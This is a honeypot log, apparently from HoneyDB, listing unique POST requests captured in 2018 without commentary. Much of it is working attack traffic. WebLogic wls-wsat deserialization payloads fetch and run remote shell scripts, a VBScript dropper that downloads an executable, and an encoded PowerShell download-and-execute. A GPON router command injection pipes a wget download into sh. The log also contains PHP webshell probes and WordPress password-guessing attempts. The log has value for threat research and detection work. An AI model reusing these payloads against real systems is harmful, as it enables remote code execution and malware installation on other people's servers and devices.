Unique POST requests collected from HoneyDB data

honeydb-post-data-2018-07-08.txt

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache

Q/Rayd3IZhxBqzgkL0J7deIVkVpJ20LD8qxp2iY6wqlhb7uJMoBoekEb9ZFuseGv3J5TnIUnC7pDXGwIc/1LM7v/5BNrkt/rlfBG7gZ4m7O7CGW0DCGfqGVXT4c7ex/ZNqFhOM1WyXCI+nAcWTbrF95VC2y3XDi1VpsMdE06YNWnmYdB57kkO1ZFTa9uxMukUBALs0kybZEXot2gj8gGd2NnoFzMpfbX85JschPX0MBY1uJV1TdhBQKcQ6h+ZBAC7JVBKqUXtuBu+ZyiJZRk7+OB/kVcWeWKqzEaavg1C1dEg4+sfjWcvU2N2DcvbPsx9aF/qYjhYuJSQ8AeawsNCcvwwlJg1aQuG+hrAPX5qkTOLzmaNTeIVqPUvdDNitzOR+WUyDoOfskqy7Txzxlf9JZy

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1043
Content-Type: multipart/form-data; boundary=WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

895028
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

711ce935c81908a4f1c10d1623d47ff4
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2--


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache

log=172&pwd=172888

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
Á*4?Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

axa=die('Hello, Peppa!');

POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23



POST http://check.proxyradar.com/azenv.php?auth=149503078861&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 20
Cache-Control: no-cache

log=admin&pwd=aaaaaa

POST http://check.proxyradar.com/azenv.php?auth=149547882835&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 28
Cache-Control: no-cache

log=jamesatchue&pwd=99999999

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 20
Cache-Control: no-cache

log=admin&pwd=171717

POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

axa=die('Hello, Peppa!');

POST http://check.proxyradar.com/azenv.php?auth=149604380857&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache

log=172&pwd=monkey

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache

SqNckt+eYZF7jH4xIPiStx+KsAmgALBzeeEKyXVpDXYERhZ4Tn/7gxAJAtuEdLnBGSraQCHmjktBuyNJU09rKJr0Whbgx0jJwDzFhjqoqezDe4NMY+egJmC5xZ6cW88zRTH2gmLxZ/uV2syHuBmx+qz1g317uBw6ASnBoJDz5+V4wc2nHwvHM/gPUw7m/GNZXFLWTX5y4+VGYKxgg53YwRVrRsKZBjbPymnI6fuMFRAgMO9FX1qY7VHjQEVjc3+rWzSq5SyDQisWCy7+nSxzbGkVGuXk8J9v9Sd8Q8bF9BufnmHfqV6jXQrF1QEQKqsD8isO1KkDOHFx4kXyig5/7wt9mSotStfrgvss/LIxjhx6m47dOtHf+6QQk7Mz8Heuz4aB2O7xmzwU/BrhYu4kMWyCcFVblP2H6SooiTCEchxcdGJ7Unw=

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
ÜôOÃÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÆ˛Y›∆√«∆fl

POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache

log=admin&pwd=test1

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
%ÑlhÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¯+Y›∆√«∆fl

POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=17&ac=50&pos=32518&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.banner","des":"","sug":-1}]

POST / HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Host: x.x.x.x
Content-Length: 0
Connection: close



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
Á*4?Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://check.proxyradar.com/azenv.php?auth=149460066237&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

m=die((string)(111111111*9))

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache

&verifycode=&ip_port=162.252.243.126:8080

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
/ïÊ|Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î&á.Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

m=die('Hello, Peppa!')

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 22
Cache-Control: no-cache

log=admin&pwd=17233333

POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 26



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
I™cÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÊöY›∆√«∆fl

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1069
Content-Type: multipart/form-data; boundary=0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

329937
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

892970794664e96c8e660be7c39e7de0
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV--


POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
I™cÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÊöY›∆√«∆fl

POST http://check.proxyradar.com/azenv.php?auth=149517555919&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 360
Cache-Control: no-cache

Q6xWx9PNbPx9u2hkZlelWbTXjU4MR+FbF0PgF4FHjZMIe6RjjuTWvskIH6GhDtkvm+J/nOqMlwY2npO1Jw4nZP+rqI6lRuvq1HslIimZ+GzOVCpRITNT/ePfHAiTdF1cxFW1dO3RDkZ6zNHs8wsRa9K5GT0w8ioKO8yGEb23o4zBfnjx0zfTmvw6DyZ76bgRdk24gXRma2/L7lp6MmMOxK5bAtoWOQp/tdoorKUKxGQISPN/R4MohWzajOs6YzvbrzWgK1YX5F8EfwKKlz2XgiCWoMTM9VT+dcxcUzysi5cYZE4yagoOU4YNv72AZ6qFmTVE7k8GjxvAqgmvMYJzcpCDxy8llDDhRvuxG7U=

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
a‰ÃÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞-Y›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache

BQi0xXwWBUGT77zzl7LXfYu0hFx18CGDGsU6vGrk9HkFAZ9e2Aa0j7iB6c+RnODsuh5q7UaiDS8blMr2DYnqEv/dBbVu52tVhPyg8XqgShGUteW7KbXtibEeUdeW4lJ17y0lpLV4tJVqbRwV3DyhPxk2FxeQfqCvp2LLwDNQ8RLuhPzh4KBxvKcUrKfqBV4JBa+ZMWIFqiG/DffTYrDfP7x0l3iKL3MJXh5xiU9AZROuhrqN+FulvH2pcvxcxsokL55kMndBW6Q6M07OA9+hGRJ35G9k6at6BhuopdoTakVOp6xh84lI9hKCQeOOzPTUlrUzwF1ZsUkQjal49REteqnl81k2mPvAcG0j6uWtiKXi3lRwF3gkvjlhJm233pN0Nd9Dsw==

POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache

&verifycode=&ip_port=162.252.243.126:8080

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache

log=172&pwd=172zxc

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
l»9≤Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÅ Y›∆√«∆fl

POST http://check.proxyradar.com/azenv.php?auth=149607147675&a=PSCMN&i=1082769120&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
